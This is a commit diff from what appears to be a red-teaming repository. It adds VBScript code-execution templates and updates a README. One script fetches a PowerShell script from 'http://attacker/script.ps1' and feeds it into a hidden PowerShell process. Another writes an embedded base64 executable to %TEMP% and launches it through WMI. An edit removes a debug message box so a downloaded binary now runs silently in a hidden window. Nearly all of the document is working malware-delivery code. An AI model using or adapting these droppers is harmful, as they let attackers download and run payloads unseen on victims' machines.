Added code-exec-templates and some additions to rogue-dot-net

red-teaming/code-exec-templates/README.md

@@ -15,6 +15,10 @@ Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets usin
 
 - **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
 
+- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
+
+- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
+
 - **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
 
 - **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.

red-teaming/code-exec-templates/download-file-and-exec.vbs

@@ -29,9 +29,7 @@ If xhr.Status = 200 Then
 
     ' STEP 3: Execute file
     cmd = out & " " & parameters
-    MsgBox cmd
     sh.Run cmd, 0, False
-
 End If
 
 Set sh = Nothing

red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs

@@ -0,0 +1,34 @@
+'
+' Example of downloading a binary file from the URL, saving it to the
+' local filesystem and then launching.
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+scriptURL = "http://attacker/script.ps1"
+launcher = "powershell -nop -w hid -Command -"
+
+Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
+xhr.Open "GET", scriptURL, False
+xhr.Send
+
+Function bin2a(Binary)
+    Dim I,S
+    For I = 1 to LenB(Binary)
+        S = S & Chr(AscB(MidB(Binary,I,1)))
+    Next
+    bin2a = S
+End Function
+
+If xhr.Status = 200 Then
+    With CreateObject("WScript.Shell")
+        With .Exec(launcher)
+            .StdIn.WriteLine bin2a(xhr.responseBody)
+            .StdIn.WriteBlankLines 1
+            .Terminate
+        End With
+    End With
+End If
+
+Set xhr = Nothing

red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs

@@ -0,0 +1,47 @@
+'
+' Example of dropping an embedded, base64 encoded binary file to the disk,
+' decoding it and then launching.
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+saveFileAs = "%TEMP%\foo.exe"
+launchParameters = ""
+
+' =============================================================
+
+fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
+
+' =============================================================
+
+Function Base64Decode(ByVal vCode)
+    Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
+    oNode.dataType = "bin.base64"
+    oNode.text = vCode
+    Base64Decode = oNode.nodeTypedValue
+    Set oNode = Nothing
+End Function
+
+Dim sh: Set sh = CreateObject("WScript.Shell")
+out = sh.ExpandEnvironmentStrings(saveFileAs)
+
+With CreateObject("Adodb.Stream")
+    .Open
+    .Type = 1
+    .write Base64Decode(fileBuffer)
+    .savetofile out, 2
+End With
+
+computer   = "."
+Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
+        & computer & "\root\cimv2")
+
+Set startup = wmi.Get("Win32_ProcessStartup")
+Set conf = startup.SpawnInstance_
+conf.ShowWindow = 12
+
+Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
+
+command = out & " " & launchParameters
+proc.Create command, Null, conf, intProcessID